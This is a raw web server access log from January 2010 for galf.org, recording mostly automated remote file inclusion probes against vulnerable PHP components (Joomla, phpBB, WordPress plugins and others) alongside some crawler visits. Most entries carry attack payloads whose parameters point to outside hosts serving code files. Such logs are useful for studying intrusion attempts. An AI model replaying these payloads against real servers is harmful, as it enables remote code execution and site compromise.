189.72.28.14 - - [17/Jan/2010:22:45:57 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:46:01 -0800] "GET /logs/access_091214.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [17/Jan/2010:22:46:11 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [17/Jan/2010:22:46:12 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [17/Jan/2010:22:46:14 -0800] "GET /logs/access_090824.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:46:17 -0800] "GET /logs/access_091109.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:46:20 -0800] "GET /logs/access_090720.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:46:20 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:46:20 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:46:38 -0800] "GET /logs/access_091214.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:46:57 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:46:58 -0800] "GET /logs/access_090720.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:46:58 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:47:07 -0800] "GET /logs/access_090706.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:47:10 -0800] "GET /logs/access_091109.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:47:21 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:47:21 -0800] "GET /logs/access_090720.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:47:21 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:47:36 -0800] "GET /logs/access_090810.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:47:36 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:47:56 -0800] "GET /logs/access_090706.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:47:56 -0800] "GET /logs/access_090706.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [17/Jan/2010:22:48:11 -0800] "GET /logs/access_091228.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:48:40 -0800] "GET /logs/access_091102.log%20%20/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:22:50:42 -0800] "GET /logs/access_090810.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [17/Jan/2010:22:50:42 -0800] "GET /labia/?M=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:22:54:48 -0800] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
201.45.123.132 - - [17/Jan/2010:22:54:49 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
201.45.123.132 - - [17/Jan/2010:22:54:49 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
78.110.50.121 - - [17/Jan/2010:22:54:58 -0800] "GET /logs/access_090810.log//wp-content/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:22:54:58 -0800] "GET /logs//wp-content/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:22:54:58 -0800] "GET /wp-content/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [17/Jan/2010:22:55:35 -0800] "GET /logs/access_091005.log HTTP/1.1" 200 7786947 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:22:59:28 -0800] "GET /logs/access_100111.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:22:59:29 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:22:59:29 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:22:59:42 -0800] "GET /logs//wp-content/myfunctions/mygallerybrowser.php?myPath=http://host.yfes.tyc.edu.tw/xoop2018/uploads/tadgallery/medium/2009_04_24/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:22:59:42 -0800] "GET /wp-content/myfunctions/mygallerybrowser.php?myPath=http://host.yfes.tyc.edu.tw/xoop2018/uploads/tadgallery/medium/2009_04_24/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:23:00:06 -0800] "GET /logs/access_091214.log%20%20//wp-content/myfunctions/mygallerybrowser.php?myPath=http://host.yfes.tyc.edu.tw/xoop2018/uploads/tadgallery/medium/2009_04_24/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:23:00:13 -0800] "GET /logs/access_091130.log%20%20//wp-content/myfunctions/mygallerybrowser.php?myPath=http://host.yfes.tyc.edu.tw/xoop2018/uploads/tadgallery/medium/2009_04_24/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:23:00:31 -0800] "GET /wp-content/myfunctions/mygallerybrowser.php?myPath=http://host.yfes.tyc.edu.tw/xoop2018/uploads/tadgallery/medium/2009_04_24/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:23:00:31 -0800] "GET /logs//wp-content/myfunctions/mygallerybrowser.php?myPath=http://host.yfes.tyc.edu.tw/xoop2018/uploads/tadgallery/medium/2009_04_24/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:23:00:31 -0800] "GET /logs/access.log//wp-content/myfunctions/mygallerybrowser.php?myPath=http://host.yfes.tyc.edu.tw/xoop2018/uploads/tadgallery/medium/2009_04_24/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:23:01:46 -0800] "GET /logs//wp-content/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:23:01:46 -0800] "GET /wp-content/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:23:01:47 -0800] "GET /logs/access_091214.log%20%20//wp-content/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:23:02:15 -0800] "GET /logs/access_091130.log%20%20//wp-content/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:23:03:06 -0800] "GET /logs//wp-content/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:23:03:06 -0800] "GET /wp-content/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:23:03:10 -0800] "GET /logs/access.log//wp-content/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:23:07:15 -0800] "GET /logs/access.log//forum///viewtopic.php?p=404//viewtopic.php?p=404&sid=http://host.yfes.tyc.edu.tw/xoop2018/uploads/tadgallery/medium/2009_04_24/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:23:07:15 -0800] "GET /logs//forum///viewtopic.php?p=404//viewtopic.php?p=404&sid=http://host.yfes.tyc.edu.tw/xoop2018/uploads/tadgallery/medium/2009_04_24/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:23:07:15 -0800] "GET /forum///viewtopic.php?p=404//viewtopic.php?p=404&sid=http://host.yfes.tyc.edu.tw/xoop2018/uploads/tadgallery/medium/2009_04_24/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [17/Jan/2010:23:07:43 -0800] "GET /logs/access_100111.log//forum///viewtopic.php?p=404//viewtopic.php?p=404&sid=http://host.yfes.tyc.edu.tw/xoop2018/uploads/tadgallery/medium/2009_04_24/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:23:11:37 -0800] "GET /logs/access_090803.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:23:11:37 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:23:11:38 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:23:11:42 -0800] "GET /logs/access_090810.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [17/Jan/2010:23:14:13 -0800] "GET /logs/scripts.log HTTP/1.0" 200 1786175 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.236.38.227 - - [17/Jan/2010:23:15:52 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.236.38.227 - - [17/Jan/2010:23:15:52 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.236.38.227 - - [17/Jan/2010:23:15:52 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.236.38.227 - - [17/Jan/2010:23:18:09 -0800] "GET /logs/access_090629.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.202.168.79 - - [17/Jan/2010:23:19:10 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
209.202.168.79 - - [17/Jan/2010:23:19:10 -0800] "GET /logs/access_090504.log HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
85.236.38.227 - - [17/Jan/2010:23:23:41 -0800] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.236.38.227 - - [17/Jan/2010:23:24:01 -0800] "GET /logs/access_090629.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:26:32 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:26:32 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:26:32 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:27:01 -0800] "GET /logs/access_091116.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:27:24 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:27:24 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:27:24 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:27:48 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:28:04 -0800] "GET /logs/access_091116.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:28:27 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:29:25 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:29:45 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.68.53.167 - - [17/Jan/2010:23:32:19 -0800] "GET /logs/access_100111.log///?_SERVER[DOCUMENT_ROOT]=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.68.53.167 - - [17/Jan/2010:23:32:19 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
77.68.53.167 - - [17/Jan/2010:23:32:19 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:23:32:40 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:23:32:40 -0800] "GET /logs/access_090803.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:23:32:40 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:23:32:51 -0800] "GET /logs/access_090810.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.68.53.167 - - [17/Jan/2010:23:32:53 -0800] "GET /logs/access_100111.log///?_SERVER[DOCUMENT_ROOT]=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.68.53.167 - - [17/Jan/2010:23:32:53 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
77.68.53.167 - - [17/Jan/2010:23:32:54 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:34:04 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:34:04 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:34:04 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:34:05 -0800] "GET /logs/access_090803.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:34:14 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:34:14 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:34:14 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [17/Jan/2010:23:34:14 -0800] "GET /logs/access_090803.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [17/Jan/2010:23:38:34 -0800] "GET /labia/?D=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
82.52.127.95 - - [17/Jan/2010:23:40:24 -0800] "GET /(null) HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" "www.galf.org"
209.202.168.79 - - [17/Jan/2010:23:40:33 -0800] "GET /logs/access_090427.log HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:23:41:54 -0800] "GET //citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:23:41:57 -0800] "GET /logs///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:23:41:57 -0800] "GET /logs/access_090907.log///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [17/Jan/2010:23:43:59 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.158.155 - - [17/Jan/2010:23:43:59 -0800] "GET /delete_all.php?board_skin_path=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.158.155 - - [17/Jan/2010:23:43:59 -0800] "GET /logs//delete_all.php?board_skin_path=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [17/Jan/2010:23:44:28 -0800] "GET //citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:23:44:28 -0800] "GET /logs///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:23:44:29 -0800] "GET /logs/access_090907.log///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:23:50:42 -0800] "GET /logs/access_091123.log///citywriter/head.php?path=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.202.168.79 - - [17/Jan/2010:23:51:24 -0800] "GET /xinha/plugins/ImageManager/thumbs.php HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
209.202.168.79 - - [18/Jan/2010:00:00:02 -0800] "GET /xinha/plugins/ExtendedFileManager/manager.php HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
